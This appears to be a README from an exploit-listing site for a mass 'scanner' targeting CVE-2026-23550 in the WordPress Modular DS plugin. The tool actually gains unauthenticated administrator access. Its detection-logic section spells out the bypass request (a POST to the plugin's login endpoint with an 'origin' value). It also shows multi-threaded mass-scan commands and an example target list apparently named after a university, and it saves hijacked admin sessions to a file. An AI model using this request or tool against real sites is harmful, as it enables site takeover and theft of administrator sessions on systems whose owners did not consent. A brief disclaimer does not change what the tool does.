Share
## https://sploitus.com/exploit?id=0674FE5F-3223-5C87-AD5E-92DBC8265D10
๐ฅ CVE-2026-23550 Modular DS Scanner
Multi-threaded Python scanner for CVE-2026-23550 (CVSS 10.0) WordPress Modular DS plugin โค2.5.1 vulnerability affecting 40k+ sites. Detects unauthenticated admin takeover via getLogin() bypass with full wp-admin access verification.
Features โจ
๐ฅ Full admin access detection (cookies + wp-admin verification)
โก Multi-threading (up to 50+ concurrent targets)
๐ Animated progress bar with rich
๐จ Colorized summary table
๐พ Auto-save vulnerable targets to file
๐ Production-ready timeouts & error handling
Installation ๐
bash
pip3 install requests rich
chmod +x modular_ds.py
Usage ๐
bash
# Mass scan (50 threads)
python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt
# Bug bounty recon
python3 modular_ds.py -l univ-oran1.txt -t 20
# Default (20 threads, vulns.txt output)
python3 modular_ds.py -l targets.txt
targets.txt format:
text
https://target1.com
http://site2.com
# Skip comments
https://sub.domain.tld
Arguments
Flag Description Default
-l, --list Required Targets file (1 URL/line) -
-t, --threads Max concurrent threads 20
-o, --output Vulnerable targets output file vulns.txt
Sample Output ๐ฅ๏ธ
text
๐ฅ CVE-2026-23550 Modular DS Scanner ๐ฅ
Targets: 247 | Threads: 50 | Output: bounty_vulns.txt
โ Scanning Modular DS... 127/247 (51%)
โ
VULNERABLE: https://target.com
๐ฅ FULL ADMIN ACCESS: target.com
โโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโ
โ Status โ Target โ Details โ
โโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโค
โ ๐ฅ FULL โ https://target.com โ 3 cookies โ
โโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโ
๐พ 4 vulnerable targets โ bounty_vulns.txt
Detection Logic ๐
text
1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
2. โ
Check wordpress_logged_in_* admin cookie
3. โ
Verify /wp-admin/ dashboard access
4. ๐พ Save confirmed FULL ADMIN ACCESS targets
Legal & Ethical Use โ๏ธ
text
โ ๏ธ STRICTLY FOR:
โ
Authorized pentesting
โ
Bug bounty programs
โ
Security research labs
โ
Owned infrastructure
โ NEVER use on unauthorized targets
Requirements ๐ฆ
text
requests>=2.31.0
rich>=13.0.0